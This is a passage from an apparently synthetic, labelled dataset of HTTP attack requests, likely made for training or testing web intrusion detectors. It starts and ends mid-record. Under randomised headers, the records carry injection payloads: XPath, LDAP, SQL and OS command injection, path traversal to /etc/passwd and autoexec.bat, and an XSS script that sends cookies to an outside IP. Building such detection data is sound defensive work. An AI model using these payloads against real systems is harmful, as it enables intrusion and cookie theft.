lEentaet=tsnwr1om7Mt|8&r7dToNsu3IhoN=t4']   |     P |  //user[   name/text() = 'nre&7UxGgA=13&h6ceie4=inntatia&wp-sMjQxml1=p+ukc&?4&rDa_qlexeciV=mr&h2aKartttCm=7&jtna=?bk&hdE51r8onaeer=ufnlltCpjue2mvv&oteereEih=3508&eE9yi=33lLqFB_cL9h&stsgfSiodUli=49159789&e3GezC=au1get

End - Id: 48604
Start - Id: 35485
class: XPathInjection
GET /ikzmZE9KKhshdfXPI/rYneudwlcegNOegmrX/lhmN09gV7A7prQiKKQJl.cgi?qpeaed1echtoni=sVrCzVm6O&xs=Qc&nuph=6+n%29hs&e5kf=window.opene%24r1%3DinsertNiSyeetae%2Brha&l0wmgsAyomvhe=spyxeBi-&s2LwdropZUiframetgP=69242521&6nima=pawnceofa%40reT&SatsiuhxdmotTnp=Sdropu+symo%3Epgbc&srbnsebtfrlee=e4e%3FnhetOgw%5B&eekaNihchmher=rflssystem&iwreh=mthx&iliether=0818274138 HTTP/1.1
Host: 74.174.95.171
Connection: aeelrl
Accept: */*
Accept-Charset: x-mac-korean, x-mac-cyrillic, x-mac-hebrew;q=0.1, iso-2022-kr;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: ahaHxs=wza
Client-ip: 206.249.169.235
Cookie: uuWXms1h4=tklya5cro;satictsanwm=binnr<m;hn=408;_zf8srZ=hdO
Cookie2: $Version="5"
Date: Tue, 15 Mar 05 21:07:56 UTC
ETag: W/"moDPEbNMHT42qaJj8ObB"
From: s3ut@xt9iriil5b.ch
If-Unmodified-Since: Sat, 12 Dec 09 07:04:43 UTC
If-None-Match: "phwXm-9@0KKB-L32y"
If-Range: *
Max-Forwards: 075
Pragma: Ctlc='nhtoG'
Authorization: NTLM eTI5N29oY2R1bmVhQW5jY3RmaWRzbXJ4ZVNhYjRsaXNlcXBhSTNoY2U=
Referer: http://www.Rtgzrhii.ch/gEeTt/ahctl/oehf/el4nn4c.cfm
TE: trailers,trailers,deflate
User-Agent: i/eps/aer/child::node()[position()=1]   or    'oohhu'= '
UA-Disp: 8169,714,8
Via: HTTP/4.2 163.182.127.217:1, 1.0 172.7.29.75, FTP/2.1 www.eeyaehid.shtml
Transfer-Encoding: deflate
Upgrade: rin/2.9, risq/5.7, tEode/5.9

null

End - Id: 35485
Start - Id: 46784
class: XSS
PUT /eGAciffdjBp6BDrydZI/pmqd5jIx8T/U3reiclggenotfio/3rylgtteadcqeIr/elLQ_RicuRW76yM9/s_d2TPjF5MoC6_C/r2-Kz.2U75O96Ev02uo/72lbXNLiAcy.png? HTTP/1.0
Content-Length: 284
Content-Language: ta5et,9,r2imm0t
Content-Encoding: gzip
Content-Location: /sanae.pdf
Content-MD5: em0xdHBuZGNoeXJoZWVldA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 17 May 05 24:01:53 CET
Last-Modified: Fri, 22 Jun 07 07:22:57 GMT
Host: 249.86.107.19
Connection: close
Accept: audio/*, image/png;q=0.8, audio/basic;q=0.2
Accept-Charset: euc-tw, euc-tw;q=0.8, koi8-r
Accept-Encoding: *
Accept-Language: yni7t-tas;q=0.0, e-seih;q=0.4, a-rxotiWe8
Cache-Control: only-if-cached
Client-ip: 251.85.125.254
Cookie: etidl=stylehtn?yrjef1Do]najg ;dn=aZnltupdate-;2dwoapmnu6at=in?ii;NSd4osI4weREk=rwnnlAatnecjueo7is;fablu=tjbodydT07d/rt;hfrfrcnoacU0t=ndsock_streama@nsstT4ut
Cookie2: $Version="999"
Date: Mon, 27 Mar 06 07:10:39 CET
ETag: W/"9ru54XN6zAHoJv82D"
Expect: 100-continue
From: fnwte@lpuewgs.de
If-Modified-Since: Sun, 03 Dec 06 17:17:08 GMT
If-Unmodified-Since: Thu, 19 Oct 06 24:23:05 UTC
If-Match: *
If-None-Match: "Vt60Asb7ZcDmgpveNk"
If-Range: "QfKIttdW1bIcGTA-4LN"
Max-Forwards: 95
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: sdnda be5npAfd=Esnrrha
Authorization: NTLM aWNlanAwbWpzcGplYWl1dGU1cnRoZmhuZGVzNUVBYnJwZG5lZTZmbVRzZW5uaA==
Range: 462-
Referer: /tsyo8Dat/tg2nb7E/eogas/x3Ci/Tersrrv.txt
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/5.3 (Windows; U; Win 9x 2.6; aS-is; rv:0.7.5) Gecko/33464169
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 818x5674
Via: 4.2 95.239.189.82, eneyo/9.0 181.234.52.117
Transfer-Encoding: gzip
Upgrade: uugt9t/7.7, bihs/8.6, ei8Or/1.6, cnflaa/4.8, 1yu/6.0
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 124.216.57.225
X-Serial-Number: 80684101
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NdropPNC9f_=nRilrt94ywowDp&7uei4r9ise=14769&gs=8635348&eesuu=<style    ><!--</style    ><script   >[window.open('http://99.184.102.104/nd.asmx'+document.cookie);]//--></script  >&eet=68604&tto=a4T@l@ewe0&neg=fNS&IbuJ-.qj=roa-b

End - Id: 46784
Start - Id: 37066
class: LdapInjection
GET /smZ690MlMV/eIU2RJ_HiRXvg/asrimndFloysriase/jeTnpOnhw/e_r/ldtioimn3/hfoZS4UrD/gcnit.gif?dLssrh1=r4ha1&7u6gaattR=opt%7CenvlreepmB&cmTta=28&sii5eoemunemdat=nic%29%28%26%28objectClass%3D+++ei*%29&2ip7haqmod1=aur2z9rthire&olgrdhnev=gqexec7gai&eideebrozory7=i55ero&iiirm3=rSpPG%40k&ggaIoe=30377231&edrhe=isEtep%3C1aeufL&nsdjiss=5502441&xZi5=577325 HTTP/1.0
Host: www.dsvtji.st:7075
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 168.141.92.244
Cookie: leesi4i3=3
Cookie2: $Version="212"
Date: Sun, 30 Dec 07 13:14:51 CET
ETag: W/"Kzo6hXv1PcdAEDWXUlNO"
Expect: 100-continue
From: umuI@4eritQe.de
If-Modified-Since: Wed, 12 Aug 09 08:55:48 CET
If-Unmodified-Since: Tue, 31 Aug 04 12:17:46 CET
If-Match: "81I0yXm7WJssAtFypo0U"
If-None-Match: "iH6GTZsjCvihiJ.7"
If-Range: Fri, 03 Nov 06 22:30:05 GMT
Max-Forwards: 372
MIME-Version: 4.7
Pragma: mnseght=qrs0
Proxy-Authorization: pbvh geI1d=2fi3a
Authorization: Digest nc=1E7CAAFB
Range: 03242-,-0
Referer: http://www.4oehreA7.cz/BdxAo/erAseehe/hlo4/eWitt/roziatn.pdf
TE: gzip;q=0.6
Trailer: Cache-Control
User-Agent: eryiv (o6PVBQT; fZFHj4dJJW; c9lh6HKBY; ew04eYkNVv)
UA-CPU: PowerPC
UA-Disp: 428,496,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1905x9959
Via: HTTP/8.7 86.180.61.185
Transfer-Encoding: deflate
Upgrade: ESst/3.1
Warning: 047 34.25.200.147 "rrtrnbieiteop" "Sun, 03 Feb 08 04:41:40 UTC"
X-Forwarded-For: 75.212.179.183
X-Serial-Number: 84105
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37066
Start - Id: 48313
class: XPathInjection
GET /sS4de6VW.bin?gonluHea=ak3U&anoat=2206279&2sinIdulz4d7Eu=985&TrlsWkinwewibud=423610&te3=417&69ar4uoxenssEr=ihaving&re8ortwyihofano=%3AaHefaftpNTphavinge%7E HTTP/1.0
Host: www.nohasso1e.be
Connection: typeisew
Accept: image/*
Accept-Charset: *;q=0.9
Accept-Encoding: tu/cnsr/t4dr/child::node()[  position()=07]   |    a7a/tz/neAtn8/child::text()[position()=510]     or 'otLm8' =  '
Accept-Language: iomw'   or   path/child::node()[position()=N]     or    'suxen3W'    = '
Cache-Control: no-store
Client-ip: 160.149.221.171
Cookie: 7hco=66106309;er=31469071;9@udr-B-GAUhaving=r8w;cNh4ToS=xzOn;ijHunawj1sgunhn=7433
Cookie2: $Version="428"
Date: Sat, 03 Sep 05 15:24:43 CET
ETag: "5iy6r8NdIpbUNk@VBE"
Expect: preieae1=rrnnt7r
From: eoohueg@assyib.com
If-Modified-Since: Sat, 26 Feb 05 07:01:52 GMT
If-Unmodified-Since: Tue, 27 Dec 05 19:44:27 GMT
If-Match: *
If-None-Match: "ASv81J5xMxH@MerMZL_A"
If-Range: Wed, 20 Jul 05 21:15:21 CET
Max-Forwards: 6
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: qtfde 1Tic=etNhghne
Authorization: tneeIs sthrvtc=Co5pmh
Referer: /otkwohu/d4e9dte/asLrzmae.php
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.2 (compatible; 5dub6dnew; Linux i386; 5toie)
UA-Disp: 296,6544,16
UA-Pixels: 433x249
Via: 5.1 www.cgDcrq.htm, FTP/1.1 51.255.105.88
Transfer-Encoding: identity
Upgrade: rkeue/0.5, esr10/3.0, 1eda/2.9, seo/9.6, 7lh/2.5
Warning: 835 www.tlNlwgs.gif:920 "iep7CLmofu" "Sun, 29 Feb 04 15:41:20 GMT"
X-Forwarded-For: 49.73.220.16
X-Serial-Number: 17618194843
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48313
Start - Id: 43264
class: OsCommanding
GET /etf7jltr.html?2msa=eviEryiAaa3&nlElrbprnniIr=eraedsj&iscuxrmSr=%7C++++echo++%22+++Content-Type%3A+text%2Fhtml%22%3B+++++echo+++%22%22+%3B+++id+++%5C0&ihrptCO=80524942&Rle40ePs=05477&ellcnadso5=o+B5acia5m&619ug0pU6KT=4041632&1LDs7F@wD=759096&hg=%7EHf+Ode4drry0e&soihna=9952 HTTP/1.1
Host: www.hrjtqiscwt.cz:5220
Connection: close
Accept: image/jpeg;q=0.0, audio/basic;q=0.5
Accept-Charset: hz-gb-2312, windows-874, windows-874, iso-8859-9
Accept-Encoding: 
Accept-Language: tf8hxhd-merljc2, i13a-t1;q=0.9, mc-se;q=0.8, o-a5eox;q=0.8
Cache-Control: only-if-cached
Client-ip: 116.247.114.110
Cookie: fN2tJ0oupdateYwh-=q;epxhSp7qrw7=adminc9n+t;k8NU21YHmFKwhere=1627
Cookie2: $Version="54"
Date: Mon, 11 Sep 06 22:08:00 GMT
ETag: "PEioMFbnQm-_spjg_"
Expect: 100-continue
From: ejAo@hngo.biz
If-Modified-Since: Thu, 30 Apr 09 08:04:16 CET
If-Unmodified-Since: Sat, 12 Mar 05 19:13:53 CET
If-Match: "3wHsDmCKe@D3oXCdyoo"
If-None-Match: "kM.0C@TK9XLxfleixvg"
If-Range: *
Max-Forwards: 571
MIME-Version: 8.0
Pragma: r2='hqt'
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: ahl7bk igiat=hita
Range: -640387
Referer: /tdi3xnfm/oT0Nh/ibli/erlhr.gif
TE: trailers,trailers,chunked;q=0.1
Trailer: Via
User-Agent: Pnsuip9b/0.9.4.3
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 842x6548
Via: 3.5 147.116.170.65, oyk/3.9 18.43.240.207, 8.9 29.18.197.225
Transfer-Encoding: compress
Upgrade: lnphe/4.9
Warning: 384 219.222.86.255 "aogtwagsnadtz" "Mon, 28 Nov 05 01:30:13 CET"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 553121190182203403
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43264
Start - Id: 45370
class: PathTransversal
POST /e_guceGdu4hZ6t8U/xXEH@7QhYhome/copy4replaceq@DcyQWr-/tte1e/Mstdin1.yAKzt/Esctqylsose.jpg? HTTP/1.1
Content-Length: 124
Content-Language: ahtlfv6,d8utrr,sh
Content-Encoding: deflate
Content-Location: http://Yebt.be/ard3/u3arU6t/mnss/easae4jq/usfyrueh.php3
Content-MD5: aGxpdHJibkVvZmFvbWVobg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 28 Feb 10 01:38:33 GMT
Last-Modified: Sun, 13 Jan 08 08:57:49 UTC
Host: www.hwre.be:80
Connection: close
Accept: image/*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-stale=5
Client-ip: 45.42.189.117
Cookie: -tCadmin-=aOwget;ap=sssm2o;lNa4leei=trule8nld
Cookie2: $Version="96"
Date: Mon, 12 Feb 07 08:06:12 CET
ETag: W/"B9SBjm1lLCiZpvnPjtU"
Expect: 100-continue
From: meaol@shaU.gov
If-Modified-Since: Sat, 20 Mar 10 11:23:22 UTC
If-Unmodified-Since: Sun, 23 Dec 07 24:30:02 UTC
If-Match: "8bl_RjSClDPqSdpag"
If-None-Match: *
If-Range: Wed, 15 Feb 06 13:51:42 UTC
Max-Forwards: 718
MIME-Version: 4.4
Pragma: eel='sy'
Proxy-Authorization: Basic c2V1cnRtcjpkZTF1
Authorization: Digest uri=http://www.o79mnh.org/gTci/rd7hnnis.tar
Range: 74377-10,-135
Referer: http://www.aezs.biz/c0s0t/ewcie.cfm
TE: trailers,gzip;q=0.4
Trailer: Transfer-Encoding
User-Agent: aceeirtitxxrtt24
UA-CPU: Sparc
UA-Disp: 9353,7001,16
UA-Color: color8
UA-Pixels: 0455x0884
Via: HTTP/8.7 182.24.46.159, enei/5.9 www.ctynna74.gif
Transfer-Encoding: compress
Warning: 033 102.101.187.47 "senpv3nMsOiNryeagcPt" 
X-Forwarded-For: 42.158.87.228
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

io8hdttch=+s&sE8.I0t2Bx@=6025&ieYtgctbd=../../../../../../../../../WINDOWS/autoexec.bat&ob=kQ7vT8sYE8-

End - Id: 45370
Start - Id: 41213
class: SqlInjection
GET /hor/eXG3ZR-UI9/e@/vt1AfDooEeCtitx/kyqrbey/asHi5aeo/6rmIa5HVjlo/isrirTizease/peEriweiaaaren.php?RItySnoi5atd=ol&akeRhiwt9=468&sHwlAb=Wyb4hfsnw&Alcnmaikrtimf4=i%29o%5B7ih&Ri=z&so1seordx=%3C7mochak&8hat=htnz%26d&oocnsfh11n=dstaxp_cstylepnsnodea+p%26idiv&nbeutet=xQj&vigmwh=01986&pb5e=ah%3Bcaid&zn7i0eoAztsR=4797631&rcoinas=Phsatohtua8a&lsTz=4%3A%27%3A HTTP/1.1
Host: www.etiikfai.cz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 'select   customer_phone   '||'from   customers   '||'where customer_surname='''|| lv_surname||''' and   customer_type=1';
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 146.208.88.192
Cookie: dieie7ftttbslo=7232840815;etoeftotna2=e dende63::xr5irp[p;rosroreweY=eEBPEa;snfabnptg8rhfw=650060
Cookie2: $Version="8"
Date: Fri, 10 Oct 08 21:29:22 CET
ETag: "bcCurLCsm8JV-ngp"
Expect: 100-continue
From: ljOoeae@dayLl.cz
If-Modified-Since: Mon, 20 Jul 09 09:07:43 CET
If-Unmodified-Since: Mon, 14 Jan 08 05:06:08 GMT
If-Match: "wTj1Zvpyz3ZKiu0a7"
If-None-Match: *
If-Range: Mon, 11 Dec 06 02:54:11 UTC
Max-Forwards: 399
MIME-Version: 5.2
Pragma: fno=m7a
Proxy-Authorization: muisi doaouyba=onhfte
Authorization: prns5s reiAh=juarld
Range: 870-,33722-,80-34
Referer: http://auhr.org/hsy3haa/dtpCw/4ee8/tidCrd/rem3.gz
TE: trailers,trailers,gzip;q=0.8
Trailer: Expect
User-Agent: exhatte5o (eVVzSL; ori5t5)
UA-CPU: MIPS
UA-Disp: 1760,871,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9140x4441
Via: 3.5 209.225.147.148
Transfer-Encoding: identity
Upgrade: sdrona/5.0, vtfpom/3.2, guE/8.0
Warning: 096 28.130.214.30:40463 "bwtv1" "Wed, 03 May 06 17:00:25 UTC"
X-Forwarded-For: 253.197.44.195
X-Serial-Number: 9505530425947859
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41213
Start - Id: 35925
class: PathTransversal
GET /tsyOstv3eehajoquB3u/L@r/ss2oqdstI/ezeiddTeEhsee/tttszafbpMrabems2s/sqv9jJ1yXSchildMQnr/fL.aspx?lrCSm7v9raAam=199240022&rn-_-styleylUei=apt1neniq+psguW&ZNEQ36rsFjB=454&trv3rn=Txxujs6tdoore&f_zC.BENfromt7=sH.zo&ttnnpojiodhye=tohGwpmatet&eTFripL5ya4vah=kPxcQ32n&hoiguteho=12&m2hioi=31614 HTTP/1.0
Host: www.1adtont.be
Connection: rn7wod
Accept: */*
Accept-Encoding: identity;q=0.2, deflate;q=0.9, deflate;q=0.7, gzip;q=0.8, deflate;q=0.3
Client-ip: 144.190.204.250
Cookie: 3m=<!--   #include virtual="/etc/passwd"-->
Date: Fri, 09 Jan 09 01:23:08 CET
If-Modified-Since: Mon, 30 Jan 06 06:58:41 UTC
Referer: /mbkNa/r3a8Ads.tiff
TE: trailers
Trailer: Accept-Encoding
User-Agent: m87QPjRLfM http://www.TmrE3tq.org
Transfer-Encoding: aeezvr

null

End - Id: 35925
Start - Id: 39046
class: LdapInjection
PUT /8isentlae6aIou/dsueevtoivharzr/ohc4r8xPRa9/ria/Bvel6kucafeobati/rot/9nthtrt6l4m.php3? HTTP/1.1
Content-Length: 274
Content-Language: eeao,nt,ook
Content-Encoding: identity
Content-MD5: VGdudGRhbG9zemtlMEVuNw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 07 Nov 06 20:04:17 CET
Host: www.ma1grsa5t.de:01
Connection: zeva
Accept: */*
Accept-Charset: x-mac-cyrillic, x-mac-cyrillic
Accept-Encoding: gzip;q=0.7, deflate, gzip;q=0.6
Accept-Language: 9nu-noha;q=0.0, f-ltfI4;q=0.5
Cache-Control: max-age=5
Cookie: wiieEeazente=dzx8E8G6i;hirhseaaipttAo=nedgnrrmodxhtebe;9497rNc6sae=n-5MFdM;opst2l=>cglo;LWDdBsvrYfu=nuQ52cL
Date: Thu, 26 Jan 06 09:47:46 UTC
ETag: W/"3cB9HlpJ4rG0odJ"
Expect: ohnrIS=4hanah
If-Unmodified-Since: Sun, 10 Aug 08 15:04:55 CET
If-Match: "yNzxsuUibc8-Pkge"
If-None-Match: *
If-Range: "-Gt5NG.BxIijq6uns0HS"
Max-Forwards: 6
Pragma: ti3='j'
Authorization: Digest username="xea8tnsA"
Referer: /b6iltj/1itcrg/rolai/atwx.pl
TE: deflate;q=0.9,gzip;q=0.4,trailers
Trailer: Referer
User-Agent: )    (  |   (displayName=had*)   (name    =   had*   )(    mail=had*    )
UA-Pixels: 094x203
Via: FTP/4.1 www.nQo8ga.tiff, 6.7 121.187.138.245, 2.6 159.135.227.0
Transfer-Encoding: compress
Upgrade: Are/6.6, yyhe4a/3.0, 7eytto/3.0, joo2/5.9
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pmaletot=<hFzia5Hbody&Tj=nJ87LDjBk-3&ee=e;onetctydJ&c4oWantrmiU3z=Iledteorheiuhai&0road1li6rO=lh5teae&ilogD45=j9xys6oxearmd&Od2adsSSfNrsea5=i8s=&8L1aLeV4a2=Ta&svns0qn2jaH=rt&gqoheoeorimio=sXP4C1IeX&spsA=05962&xoq=bbu&nyToOajsifseg9=o( sassoMq csacofromh&7nnslog=9932

End - Id: 39046
Start - Id: 35935
class: PathTransversal
GET /q3dwG/n1q/qsDQ9Q/e1Q7Y5THPA1B74e1/t5P/aivqxttxfsOU/e6Xle9.asp?iiriRaqyut=Hpp3hdo+7nmoidd&ecMPrFqamkG=o6idst&sdaa=%3C%21--+%23include+virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++--%3E&tsejNtps=n-K_&sanedtrcr0=eSdrvmhinsertmpq&z7dt7o=36803&d2HchdeReefals=eAB&dtnTm=9856708121&1idOauzrTn=ldhoessotietuelt2&nHt9frrve=assP%24s+cmdi%5B9E%7E9%24dL&fed17inhrcris=ec HTTP/1.0
Host: 140.215.222.14
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 111.208.189.237
Cookie: osEypsd=ttbr e s8s;itrot=lvar=rcornehtpass betweentmetar4I;kvnph-xhtacces0=sgncdh;deoagpt=36;yUVPB=54650086;slnjnf=8usrlinkd+:o
Date: Sat, 20 Nov 04 03:15:58 CET
ETag: W/"GNtszPWW4.S97fblBw"
From: be1oUn2@8heteu9.de
If-Modified-Since: Wed, 19 May 04 11:40:39 CET
If-Unmodified-Since: Wed, 10 May 06 21:02:53 UTC
If-Match: "q.F@FoqzdyxTHycF"
If-None-Match: "BuzDP88tDg6pyUzZC7"
If-Range: Thu, 12 Feb 09 24:36:05 GMT
Max-Forwards: 7
MIME-Version: 6.6
Pragma: N='cn'
Proxy-Authorization: Digest cnonce="ei6idr"
Authorization: Digest response="286B3b4eABfad87Ccb98fB0a08cbaC4c"
Range: -7654,73-181
Referer: http://lalnbh.uk/ltweo/yIse/uvnwtqoa.tar
TE: chunked;q=0.3
User-Agent: Mozilla/9.2 (Windows; U; Windows NT 7.4; Ms-nr; rv:3.7.6) Gecko/47460321
UA-Disp: 684,759,32
UA-Pixels: 769x5162
Via: HTTP/8.3 www.13pn.css, 4.0 www.zane.tiff, 5.8 www.t9rd1.tiff:1
Transfer-Encoding: mO6la; 6eTd=aenRl6d
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35935
Start - Id: 43408
class: OsCommanding
GET /taa/rTuieTislmebaetisee.pl?ieA=%7Eehttplog0&qidoUoyiie5Iwt=%7C+id%253b&si=rte23f%7Carl&alHttdEa=986450&9spm=210081&lerroTrdlre=uwa%3C&cilngAgrs=0QheSfDkLpu&crduo=r&Olefjr3i=k2eoedr&zdtoa9ori2=844017&AsZt=Faeee HTTP/1.0
Host: www.oreetrndr0.de:80
Connection: levmzC
Accept: */*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=57
Client-ip: 232.231.66.96
Cookie: rmso=ndoectrsnih;nasd=9omoousar5on;iedpchemhiasT=047973341;5rdcsaw4=zp
Cookie2: $Version="4"
Date: Sun, 08 Apr 07 24:41:12 GMT
ETag: W/"FBRRehdBHitCX2E"
Expect: hWd4dMn
From: fikl0E@tRser.fr
If-Modified-Since: Mon, 06 Dec 04 17:27:52 CET
If-Unmodified-Since: Sun, 16 Apr 06 09:21:15 UTC
If-Match: "cQHQgYrPwMbx8AWOq7gL"
If-None-Match: *
If-Range: *
Max-Forwards: 4960
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM RDdvbGF0YXBoaGNvaTFyYW5kZWRSc3NtSnMyc2luaHRNc2doZWVtZmE5ZTk=
Authorization: Basic c2g4ZzROaXA6bnBnZWQwcHU=
Range: 6-,47-768842,6146-09
Referer: http://www.nxrehl0.fr/urifswr/qiEwGik.asmx
TE: trailers,gzip
Trailer: If-Range
User-Agent: 7E6s/3.6
UA-CPU: 68000
UA-Disp: 9885,5189,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 9788x122
Via: 2.6 www.iaE7Tao.css, 6.9 144.211.17.34, HTTP/2.0 138.161.184.6
Transfer-Encoding: lHt9tr
Upgrade: zos/3.8, LrxEi/5.1
Warning: 667 www.eekudeq.shtml "ep6tpihnare" 
X-Forwarded-For: 207.33.218.68
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43408
Start - Id: 37059
class: LdapInjection
GET /eena/ateoggdiaatfdhED/rAbeanhwp/mftitWuyhrcinT0wdoi/t-4CaWn/smaharcw4cvhmoohgs/fQQwHtRQR/yJqsdCcT/imgY_s2y/soeIfwed.css?1syilNvled=it7h%29%28++%7C++++%28xo%3D*%29&42gaDS=ipcnmruofthcmd&TNdw=ed4a HTTP/1.1
Host: 254.127.126.113
Connection: close
Accept: */*;q=0.4
Accept-Charset: x-mac-chinesesimp;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 33.96.94.84
Cookie: ule=tsgLrwr
Cookie2: $Version="45"
Date: Sat, 31 Oct 09 11:02:02 CET
ETag: "EHiX6-deO9OfaYi"
Expect: 100-continue
From: umuI@4eritQe.de
If-Modified-Since: Sat, 16 Feb 08 05:55:14 UTC
If-Unmodified-Since: Sun, 02 Oct 05 02:56:45 CET
If-Match: "tam9Wvcj.NPBOl5OhObA"
If-None-Match: *
If-Range: Thu, 10 Jan 08 20:03:38 UTC
Max-Forwards: 443
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: Basic bWFyczpzcm9hb3B1
Range: 03242-,-0
Referer: http://www.oaie.ch/L6oeqine/tsR7sST.dll
TE: gzip;q=0.6
Trailer: Pragma
User-Agent: Mozilla/6.8 (X11; U; Open BSD i386 5.0; fd-ng; rv:2.2.9) Gecko/74483196
UA-CPU: PowerPC
UA-Disp: 428,496,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1905x9959
Via: HTTP/6.2 www.OpSNh.js, HTTP/7.7 151.99.94.185:30
Transfer-Encoding: identity
Upgrade: ESst/3.1
Warning: 047 34.25.200.147 "rrtrnbieiteop" "Sun, 03 Feb 08 04:41:40 UTC"
X-Forwarded-For: 0.114.107.58
X-Serial-Number: 595061014884085769
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37059
Start - Id: 37841
class: LdapInjection
GET /mzshn9IcfOttlQih4oh/v5WYsY0R6DK9/wF8tq/eopArnulglrudNzboh/rXsgJxr6Z0Ig5Q9SLEO/onhaeaashhSreooumt/eEhaeg1zi/bj.Mbrl/xJ_xykBJJFaFttMpTwAV/S2y6ceymdEEoyn.tiff?oaS=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.0
Host: www.jn5a.cz
Connection: dqrhaa
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.0, compress;q=0.1
Accept-Language: t-eCneATwh;q=0.2
Cache-Control: no-cache
Client-ip: 2.231.54.23
Cookie: sbadomOuloan=o|bscriptspmiEet;rehbii86tmyfwm=exec;itnstkgn8mrulet=netcathnph-eees;veednddk4se=42;SYcni0G=fnehqalaemtnaattia;o0taoseyTacNwt=577
Cookie2: $Version="3"
Date: Thu, 20 Sep 07 16:32:26 CET
ETag: "v.u7W79d5gfnlTy"
Expect: 100-continue
From: tlocso@Staohr.gov
If-Modified-Since: Thu, 22 Apr 04 01:32:46 UTC
If-Unmodified-Since: Fri, 09 Mar 07 23:25:53 CET
If-Match: *
If-None-Match: "XBOcKZN7Bz3uM7Yy"
If-Range: "G..oIsvFTps4g1nGtpp"
Max-Forwards: 27
MIME-Version: 4.8
Pragma: a8veae=fheo
Proxy-Authorization: xDzhen at43Wr=te5gtta
Authorization: NTLM ZXhTbjNFZXdkbGludUVicGlhR2JhdnR1bm90RGVlb3B3YmxBY3lrY2M5QQ==
Range: 853418-,-430
Referer: http://www.Ieedo8yt.uk/7eir7/ukczr.mp3
TE: trailers
Trailer: Accept
User-Agent: wibriyd (eMPSZWj)
UA-CPU: 68000
UA-Disp: 780,4386,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 707x739
Via: 3.3 www.yu5ol.jpeg:6, 0.8 www.creo4t.png, FTP/0.7 105.102.160.82
Transfer-Encoding: foctbw
Upgrade: msdjj/6.3, nhneNR/6.0, amsilt/6.3
Warning: 819 www.pedj.gif "e9rth" "Tue, 15 Sep 09 22:46:26 GMT"
X-Forwarded-For: 138.39.90.47
X-Serial-Number: 52385869909
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37841
Start - Id: 37602
class: LdapInjection
PUT /mHhf4fGD1DR6/SuDdNfVfsystemNg./mmbasrhush8as09Dibwl/ptk8bLZ105/Ic8EHz/deut/pRseI3/o3fswhnrzsstRe/kK/fIBf4RzCefRKPdM.css? HTTP/1.0
Content-Length: 267
Content-Language: eev,kse4sA
Content-Encoding: deflate
Content-Location: http://www.osOarg.com/nEatp1eh/t0fTi/ioeacm/omtiStp.php4
Content-MD5: c2N0c1dtbm96bnN3ck5obw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Aug 09 14:07:46 UTC
Last-Modified: Fri, 04 Aug 06 09:31:37 CET
Host: 128.39.75.129
Connection: close
Accept: image/png, video/quicktime;q=0.8, application/postscript;q=0.5
Accept-Charset: isiri-3342
Accept-Encoding: identity, identity;q=0.6, identity, compress;q=0.6
Accept-Language: 6iEnta-tna;q=0.8, fya-iu2c;q=0.3
Cache-Control: no-cache
Client-ip: 232.58.119.182
Cookie: fusbve=riT Hda te;w84dm=627926;he=jFZoBC9;eiier4=aT13ku;atleut=cemt
Cookie2: $Version="2"
Date: Tue, 16 Jun 09 03:48:41 CET
ETag: "@QX@_ywUL101QKMd"
Expect: 100-continue
